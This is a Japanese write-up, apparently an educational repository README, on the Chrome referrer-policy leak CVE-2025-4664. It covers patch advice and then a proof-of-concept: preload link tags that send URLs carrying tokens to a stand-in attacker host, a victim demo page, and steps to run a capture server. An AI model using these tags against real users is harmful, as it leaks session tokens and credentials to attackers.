CVE-2025-4664 の脆弱性は、Google Chrome の Loader コンポーネントにおいて、バージョン 136.0.7103.113 より前で確認された重大度の高いセキュリティ上の欠陥です。この問題により、リモートの攻撃者は特別に細工された HTML ページを介してクロスオリジンのデータを漏えいさせることができ、セッショントークンや認証資格情報などの機密情報が侵害される可能性があります。
この欠陥は、Chrome の Loader コンポーネントにおけるセキュリティポリシーの実装不備に起因します。具体的には、Chrome は、他のブラウザでは解釈されない、サブリソース(画像やスクリプトなど)のリクエストにおける HTTP Link ヘッダー内の referrer-policy ディレクティブを解釈します。攻撃者はこれを利用して、unsafe-url のような制限の緩いポリシーを設定することで、Chrome に URL 全体(機密性の高いパラメータを含む)を攻撃者が管理するドメインへ漏えいさせることができます。
この脆弱性は実際の環境で活発に悪用されており、米国サイバーセキュリティ・インフラストラクチャセキュリティ庁(CISA)が、既知の悪用された脆弱性カタログ(KEV)に追加しました。CISA は、連邦政府機関が対応する修正を適用する期限として 2025 年 6 月 5 日を設定しています。
Google は、以下のバージョンでこの脆弱性を修正するアップデートをリリースしています:
すべてのユーザーは、Chrome ブラウザを利用可能な最新バージョンに更新することを強く推奨します。更新を確認して適用するには:
さらに、Microsoft Edge、Brave、Opera、Vivaldi などの Chromium ベースのブラウザユーザーは、この脆弱性の影響を受ける可能性があるため、対応するアップデートに注意する必要があります。
ブラウザを最新の状態に保つことは、進行中のセキュリティ脅威から身を守り、個人情報を保護するために不可欠です。
CVE-2025-4664 の脆弱性は、Google Chrome が HTML リンクからサブリソース(画像、スクリプトなど)を読み込む際に、リファラポリシー(referrer-policy)を処理する方法を操作することで悪用されます。
🌐 悪意のあるサイトの作成:
攻撃者は、HTTP ヘッダーに次のような HTML リンクを含む Web サイトを作成します:
<link rel="preload" as="image" href="https://victima.com/imagen.jpg" referrerpolicy="unsafe-url">
🔧 referrer-policy の操作: ほとんどのブラウザでは、 タグ内のこの referrerpolicy は読み込まれるリソースには適用されません。しかし、Chrome では適用されるため、これが問題の核心です。
📤 Referer の漏えい: 被害者のブラウザ(Chrome)が victima.com からリソースを読み込むとき、送信元サイトの URL 全体を Referer ヘッダーとして送信します。これには以下の情報が含まれる可能性があります:
<link rel="preload" as="image" href="https://atacante.com/captura.jpg" referrerpolicy="unsafe-url">
被害者がこのリソースにアクセスすると、Chrome はその URL 全体を Referer として攻撃者のサーバーに送信します。
1- 攻撃者は被害者に以下のリンクを送信します:
https://atacante.com/pagina-maliciosa.html
<link rel="preload" as="image" href="https://victima.com/perfil?token=ABC123" referrerpolicy="unsafe-url">
Referer: https://victima.com/perfil?token=ABC123
攻撃者のドメインへ送信され、トークンが露出します。

index.html — 被害者ファイルこのファイルは攻撃の被害者をシミュレートするもので、悪意のある タグを使用して CVE-2025-4664 の脆弱性をどのように悪用できるかを示す簡略化された HTML デモです:
<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<title>Demo CVE-2025-4664</title>
<!-- Este recurso apunta a un sitio de la víctima con información sensible en la URL -->
<link rel="preload" as="image"
href="https://victima.com/perfil?token=ABC123"
referrerpolicy="unsafe-url">
</head>
<body>
<h1>Demostración de la vulnerabilidad CVE-2025-4664</h1>
<p>Si estás usando una versión vulnerable de Chrome, el navegador enviará el <strong>Referer completo</strong> a la URL de arriba.</p>
</body>
</html>
servidor_atacante.py — 攻撃者ファイルこのスクリプトを使用すると、Python の小さなサーバーを使用して Referer をキャプチャする攻撃を自動化できます。以下は、データを受信する攻撃者のサーバーをシミュレートする Flask を使用した例です:
index.html で表される被害者に対する攻撃をシミュレートします。pip install flask
python servidor_atacante.py
<link rel="preload" as="image"
href="http://<tu_IP>:8080/captura.jpg"
referrerpolicy="unsafe-url">
<tu_IP> を、スクリプトを実行しているサーバーのパブリック IP またはローカル IP に置き換えます。
ターミナル(PowerShell または CMD)を開きます。
ファイルのあるフォルダーに移動します:
cd "C:\Users\Sebas\Desktop\servidor_atacante"
python servidor_atacante.py
* Running on http://127.0.0.1:8080
* Running on http://192.168.1.35:8080
同じフォルダー(C:\Users\Sebas\Desktop\servidor_atacante)に、次の内容で index.html というファイルを作成します:
<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<title>Demo CVE-2025-4664</title>
<!-- Simula el ataque -->
<link rel="preload" as="image"
href="http://192.168.1.35:8080/captura.jpg"
referrerpolicy="unsafe-url">
</head>
<body>
<h1>Simulación CVE-2025-4664</h1>
<p>Este HTML intenta filtrar la URL completa (incluyendo el token) al atacante.</p>
</body>
</html>
✅ 重要: IP アドレス(192.168.1.35)が、Flask がローカル IP として表示するものと一致していることを確認してください。異なる場合は、HTML 内で変更してください。
Chrome を開きます。
アドレスバーに次のように入力します:
file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123
Enter キーを押します。
📥 サーバーで結果を確認する Flask のコンソールに次のような表示が確認できます:
[+] Referer recibido: file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123
[Carpeta destino]: ファイルを保存した場所に応じてこのパラメータを変更してください。
🎯 つまり、ブラウザが完全な Referer を攻撃者に送信したということです!
この解説は、Sebastian Peinador が、攻撃的サイバーセキュリティの教育および研究目的で作成しました。
この資料は MIT ライセンスの下で配布されています。
役に立った場合は、リポジトリに ⭐ を付けたり共有したりするのを忘れないでください!